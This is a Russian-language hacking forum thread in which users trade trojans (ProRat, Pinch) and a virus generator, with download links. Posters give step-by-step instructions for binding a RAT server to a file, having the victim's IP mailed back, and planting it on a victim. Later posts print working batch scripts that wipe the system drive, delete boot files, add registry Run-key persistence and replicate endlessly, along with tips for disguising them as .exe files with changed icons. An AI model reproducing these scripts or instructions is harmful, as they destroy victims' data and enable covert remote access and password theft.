PDA

Просмотр полной версии : Вопрос о Virus вещающий винду и HDD

longshoot
02.01.2006, 17:40
Народ, у кого есть вирь чтобы хард убил, или сразу винду валит.
Очень нужен - заранее спасибо!

m0nzt3r
02.01.2006, 17:57
слышал токо про hddkill но она палится (и все другие...)

longshoot
03.01.2006, 01:02
Да у меня она есть даже и запускал не раз)))) но не работает!!!
Выскакие вает на секунду окошко черное и все.
А есть трой который просто сконфигурировать и чтобы пароли 100 % приходили от диалапа! Я штук 8 уже пробовал мне даже мои не приходят!!
П О М О Г И Т Е !

Abra
03.01.2006, 02:00
Если пароли не приходят - конфигить надо уметь :)
А вирус чтоб хард убил.... хз мне бы тоже не помешал да если он палиться не будет но имха анриал. Все равно придется антивир вручную отключать...

xSp1D3R
03.01.2006, 02:45
пищи свой или заказывай, врятли в инете найдёш номаный халявный трой чтоб он ещё запустился и антивирь на него не орал

Hitman_2
03.01.2006, 05:05
А есть трой который просто сконфигурировать и чтобы пароли 100 % приходили от диалапа! Я штук 8 уже пробовал мне даже мои не приходят!!
П О М О Г И Т Е !

Pinch 2.58 - нормальный трой. Пару месяцев назад не палился, щас не знаю.
ProRat 1.9 - лёгкий в обращений...но подходит против полных ламеров, т.к. палится и сервер весит 342 kb. Зато еси запустится, пароли будут 100%... Проверено

•••™NO FEAR™•••
03.01.2006, 14:15
У мя есть генератор вирусов, парнишка один знакомый писал, когда собирался сносить винду решил попробывать.
Результат был потрясающий:
1. Можно делать небольшие изменения в реестре ))))
2. Есть функция формат, нажимаешь формат, затем сохранить вирус и файлик сохраняется, как только жертва открывает этот файлик, у него исчезают диски)))
ВОСТАНОВЛЕНИЮ НЕ ПОДЛЕЖИТ!!! Только если винду переустанавливать, если каму нить нужна прога пишите в ПМ и оставляйте адрес мыла! Пришлю!

Hitman_2
03.01.2006, 14:48
Скинь пожалуйста на hitman2@xaker.ru. Опробую...Заранее спасибо!
А это случаем не Апокалипсис 2 ??? Если он, то не надо...

•••™NO FEAR™•••
03.01.2006, 15:01
А это случаем не Апокалипсис 2 ??? Если он, то не надо...

Гы))) Именно он)))

Если каму нить надо, то скачать его можно здесь (http://nofearprog.narod.ru/APOKALIPSES.rar)

Hitman_2
03.01.2006, 15:12
Мда...А чё, над виндой мона поиздеваться конкретно... По моему даж не палится...
Прога маньяка млин... Не хотел бы, чтоб он запустился у меня на компе...
Её с юмором писали =))

Кстати, а 3-ий случаем не вышел?

NaX[no]rT
03.01.2006, 15:19
У мя есть генератор вирусов, парнишка один знакомый писал, когда собирался сносить винду решил попробывать.
Результат был потрясающий:
1. Можно делать небольшие изменения в реестре ))))
2. Есть функция формат, нажимаешь формат, затем сохранить вирус и файлик сохраняется, как только жертва открывает этот файлик, у него исчезают диски)))
ВОСТАНОВЛЕНИЮ НЕ ПОДЛЕЖИТ!!! Только если винду переустанавливать, если каму нить нужна прога пишите в ПМ и оставляйте адрес мыла! Пришлю!
Разве это вирус? )) просто парочку ключей в реестре меняет -)) Которые можно отследить тем же Firelog'ом =)
Вот были хорошие вирусы ) я до сих пор поражаюсь. OneHalf к примеру )

•••™NO FEAR™•••
03.01.2006, 15:20
Беспонятия... Мне её очень давно друг один давал... он очень прошареный в этом, но мы поругались и всё((

Для поднятия настроения апокалипсис самый раз пойдёт)

Zakary
03.01.2006, 15:29
•••™no Fear™•••
Классная прога. респект! +

longshoot
05.01.2006, 19:19
Чувак, пришли мне пожалуста этот генератор тоже на мыло!!!!
longshoot@mail.ru

longshoot
05.01.2006, 19:34
NO_FEAR : кинь плизз мне на мыло этот генератор longshoot@mail.ru
HITMAN2 : Тоже кинь плизз этот pro_rat трой или как его там который прост в обращении и парли приходят. И если нетрудно напиши как его сконфигурировать ( где че прописывать )
Заранее всем благодарен

Hitman_2
05.01.2006, 21:06
http://www.trojanfrance.com/index.php?dir=Trojans/ProRAT/
Тута эти про-раты всех версий, кроме последней 2.0 =))
Качай, если какой-нить архив будет с паролем, то пасс от него pro

•••™NO FEAR™•••
05.01.2006, 22:08
Кароче качайте вот от сюда www.nofearprog.narod.ru/APOKALIPSES.rar
Мануалка внутри!
+

Nexwill
05.01.2006, 22:40
Ацтой полный!=)))

N1ckeZ
07.01.2006, 12:19
longshoot
Вот тут поищи!
http://www.pro-hack.ru/download/
http://inattack.ru/rdownload/2
Но уж тут (http://xroot.hut1.ru/downloads.php) ты должен найти что тебе нужно.

longshoot
07.01.2006, 13:53
БЛииииин ну не получается чисто вот ни с одним блиннн.
Народ ну может ктонить скажет какой нада качать и как настроить и чтобы пароли на мыло приходили 100%
Я уже запарился !!!!!!!!!!!1

Hitman_2
07.01.2006, 17:22
Ну я ж тебе ссылку дал... Бери например ProRat Fix 2. Настраивать - делать нефиг, всё, кроме хелпа на русском... Что ещё надо?
Сначала зарегишь мыло на yahoo@com.
Создаёшь сервер, склеиваешь одновременно с небольшим файликом, в настройках прописываешь своё мыло, кому-нить подсовываешь сервер троя. Он его запускает, на е-майл твой приходит ип и порт, вставляешь в про-рат и радуешься жизни!!!
Тука убедись, что у твоего подопечного антивиря с фаером нет! А то не прокатит...
ProRat Fix 2
http://www.trojanfrance.com/index.php?dir=Trojans/ProRAT/&file=ProRat%20v1.9%20FIX2.zip

Усё...

longshoot
08.01.2006, 14:08
БЛин этот апокалипсис не запускается!!!!!!!!!!! ошибку выдает какуюто..чтото связяно с Comdlg32.ocx

Nexwill
08.01.2006, 14:32
Выкинь его нахррен! =))

longshoot
08.01.2006, 14:41
можеш мне трой какойнить простенький дать и написать как его сконфигурировать и чтоб пароли от инета летели на мыло ?
Ну пожалста! надеюсь на помощь!

Nexwill
08.01.2006, 14:58
Да этих троев... хренн знает сколько! =))
Пинч скачай и всё буит ок! =))

NeMiNeM
08.01.2006, 16:11
Тебе нужны пароли от инета? НУ тогда не обезательно сразу трой кидать))
Попробуй просканить сеть (сканер Retina), и используй kaht2.. Ну а если Винды у всех пропартчены то остаётся трой))

Hitman_2
08.01.2006, 18:45
можеш мне трой какойнить простенький дать и написать как его сконфигурировать и чтоб пароли от инета летели на мыло ?
Ну пожалста! надеюсь на помощь!

Да забей ты на этот апокалипсис! Ты мой предыдущий пост читал??? Там ж всё написано... Меню про-рата ж на русском!!!

longshoot
10.01.2006, 16:34
все сделал как ты сказал, пробовал на себе - пришло на мыло что надо : порт пароль и айпи.
Подключился к себе - все ок.
Потом както еще попробовал на себе пароли не приходят затем еще раза 3 пробовал - не приходят.
Что это может быть?
С апокалипсисом все ясно - я просто поставил раньше .NET framework вот он мне и не давал его запускать)

Hitman_2
10.01.2006, 17:10
Не знаю... Может из-за того, что на себе, а не на ком-то другом...

longshoot
10.01.2006, 17:20
А на аську должно тоже придти письмо ?
Я зарегал аську.

Hitman_2
10.01.2006, 19:26
Не знаю, не пробовал. На мыло яхуу точно приходит, а насчёт аськи не знаю. По идее должно.

Zaratustra
11.01.2006, 00:37
Народ, у кого есть вирь чтобы хард убил, или сразу винду валит.
Очень нужен - заранее спасибо!

Таких вирусов нет...Стелс-вирусы, а тем боллее трояны сразу файловую систему разрушить не могут...это все происходит постепенно...и за это время пользователь если не полный лох обнаружит вирь...

CreaT
11.01.2006, 21:23
даа апокалипсис это вещсч :D
но Палитьс жутко :(
Зы:Врятли это твой друг писал
апокалипсис писала Тсофт целая команда
хотя хз может он в той команде
но чот мне не верится :rolleyes: ;)

Nexwill
12.01.2006, 16:06
даа апокалипсис это вещсч
Что в нём такого???
•••™no Fear™••• действительно кто писал???

CreaT
12.01.2006, 16:40
Хорошая удобная весч легка в обращении и эффективна :)

CreaT
12.01.2006, 16:47
2longshood
сегодня выложу апокалипсис на вебфайле ближе к вечеру мало ли у тя версия паленая какаинить :)

Zheca
22.01.2006, 12:17
Вот совет для тех кому нужен вирус "чтоб винду убил". Я делаю так - сам себе вирус -тока на те машины не выше SP1 (включительно). Простым Kaht2 получаешь доступ к командной строке - стираешь или переименовываешь в папке Windows все ненужные файлы (ну типа explorer.exe) а потом taskkilом убиваешь процесс explorer.exe - у чела ясен хер перезагружается тачка а потом ниче не загружается.
У меня вопрос: как можно удаленно завершить работу антивиря?

NaX[no]rT
22.01.2006, 13:42
Вот совет для тех кому нужен вирус "чтоб винду убил". Я делаю так - сам себе вирус -тока на те машины не выше SP1 (включительно). Простым Kaht2 получаешь доступ к командной строке - стираешь или переименовываешь в папке Windows все ненужные файлы (ну типа explorer.exe) а потом taskkilом убиваешь процесс explorer.exe - у чела ясен хер перезагружается тачка а потом ниче не загружается.
У меня вопрос: как можно удаленно завершить работу антивиря?
Хватит удалить только файл подкачки )) а спешить некуда, по любому перегрузит =)
Сначала зарегишь мыло на yahoo@com.На любое мыло приходит IP, а вот по аське оно не сообщает. Но это не большая проблема, можно просто сделать: там есть функция отсылать на гейт. Как только приходит IP перенаправить его на аську средствами PHP. Поищите Tristram писал.

almaz
06.01.2008, 19:12
r†']Хватит удалить только файл подкачки )) а спешить некуда, по любому перегрузит =)
На любое мыло приходит IP, а вот по аське оно не сообщает. Но это не большая проблема, можно просто сделать: там есть функция отсылать на гейт. Как только приходит IP перенаправить его на аську средствами PHP. Поищите Tristram писал.
Не как не могу найти статью где об этом Tristram писал

brasco2k
07.01.2008, 02:22
Юзайте Kuzja т.к он надежный 100%.
+ куча настроек :)

RuDDicK
07.04.2008, 02:04
Ну вобшета Можно так: возьми любои из этих кадоф вложы в текставои Документ сахрани под
Имя фаила.бат и отправь жертве а штоб небыло подозрительно скачяи bat то ехе конвертер и периделаи из .бат в .ехе потом скачай ресхакер и периделаи иконку... а помоиму кагда конвертируеш из .бат в ехе то можна и сразу иконку поменять ))и когда жертва дважде кликнит на фаил то Код сделает свою работу...
этот код Удалит Локальные Диски дапустим C:\ D:\
@echo off
del %systemdrive%\*.* /f /s /q /c /d
shutdown -r -f -t 00

этим скриптом жертва больше не сможет фключить своё железо покашто не периустановет Винду
@echo off
del C:\windows\system32\hal.dll
del C:\windows\system32\login.bat
del C:\windows\system32\logon.exe
del C:\windows\system32\logonui.exe
start shutdown -r -t 50 -c "TEKCT"

а этот код очень харашо по издеваиця над виндои
echo @echo off>C:\windows\hartell.bat
echo break off>>C:\windows\hartell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartell.bat
echo end>>c:\windos\hartell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartell.bat /f
echo R a V e N T e C h O w N e D Y o U
pause

а вот тебе и бат то ехе цонвертер:
Download (http://www.download.com/3001-2069_4-10809009.html?spi=6eae2a80841840d3e18b1e35cd7bd867 )

--------------------------------------------
надеюсь я чемто помог...

Black dead
07.04.2008, 08:02
RuDDicK
а вот тебе и бат то ехе цонвертер:
Download

пля при запуске твоего конвектора сразу спалило в \Local Settings\Temp\2F.tmp\b2e.exe - инфицирован Trojan.MulDrop.12138

RuDDicK
07.04.2008, 14:22
пля при запуске твоего конвектора сразу спалило в \Local Settings\Temp\2F.tmp\b2e.exe - инфицирован Trojan.MulDrop.12138

Хммм... да но это единственыь бесплатный конвертер...
Другова я не нашол хатя искал долга... все были платные...
Ну можна и подругому: вот тебе Онлайн конвертер но потом иконку смениш черес реcxакер....
Online .bat to .exe Converter (http://www.f2ko.de/ob2e/ob2e.html)
---------------------------------------
P.S: Кстати вот и ресхакер если руки откуда нада растут то иконку ты лехко смениш!
Download here (No Virus) xDD (http://www.soft32.com/Download/Free/Resource_Hacker_340/4-3568-1.html)

Black dead
09.04.2008, 16:30
RuDDicK пасиб но ресхак давно ужо юзаю для склейки пинча с ярлыком

RuDDicK
09.04.2008, 17:03
куульно тогда ))
но полюбому сечяс в фаилы.бат уже некто не верит ыыы...))
вот я решил наити кокоьнебути конвертер + икон changer вот и результат

RuDDicK
09.04.2008, 17:10
а вот есче адин пример я ево назвал HDD Fuker
По структуре кода можна определить што и для чево!!!
@Echo off
color 02
title R.I.P
start
start
start
start calc
copy %0 %systemroot%\Picture2.bat>nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run/t REG_SZ
/d %systemroot%\Picture2.bat /f > nul
copy %0* .bat > nul
Attnb +r +h picture2.bat
Attnb +r +h
RUNDLL32 USER32.DLL.SwapMouse.Button
Start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
Start
cls
cd %userprofile%\desktop
copy Picture2.bat R.I.P.bat
copy Picture2.bat R.I.P.jpeg
copy Picture2.bat R.I.P.txt
copy Picture2.bat R.I.P.exe
copy Picture2.bat R.I.P.mov
copy Picture2.bat FixVirus1.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:RIP
cd %userprofile%\desktop
copy Picture2.bat %random%.bat
cd %userprofile%\My Documents
copy Picture2.bat %random%.bat
goto RIP

enjoy ))
------------------------------------------
P.S:Только заметите в коде есть визде Picture2.bat значет и вы должны сахранить ево в Picture2.bat или поменять визиде нозвание в коде в то название в каторую хотите сахронить этот код

Грот
10.04.2008, 05:54
вот 9 майская щутка на основе логической бомбы саламандры немного подедактировал код так что если джуниор не спалился то видят только 2 антивиря
принцип такой при запуске создает ключь в реестре и библиотеку если удалить то или это то будет ребут вирь ждет 9 мая и вешает винду http://depositfiles.com/files/4585584

RuDDicK
11.04.2008, 03:50
мде.... ты так и конкретно и не обеснил што и для чево? ну да (штото свеазоное с 9 мая ыыыы...)
обесьни нормально....

Грот
11.04.2008, 06:45
мде.... ты так и конкретно и не обеснил што и для чево? ну да (штото свеазоное с 9 мая ыыыы...)
обесьни нормально....
на сайте глоффа есть похожая тема там это обсуждалось там есть исходники вируса только его нужно немного изменить чтоб меньше вирей палило
там и подробное описание

(ShadoW)
19.06.2008, 16:12
Позвольте перебить вашу интеллекутальную беседу одним постом :
Если надо сделать из *bat *exe для этого можно WINRAR юзать, кого интересуют вирусы которые не палятся смотрим :
1) http://hackers2008.at.ua/load/2-1-0-1 - Сносит винду.... с разными приколами антивирём не палится ( прилагается видео по написанию вируса)
2) бэк-дор на основе радмина. читаем тут - http://hackers2008.at.ua/load/2-1-0-2
Сильно не бейте, мои первые вирусы....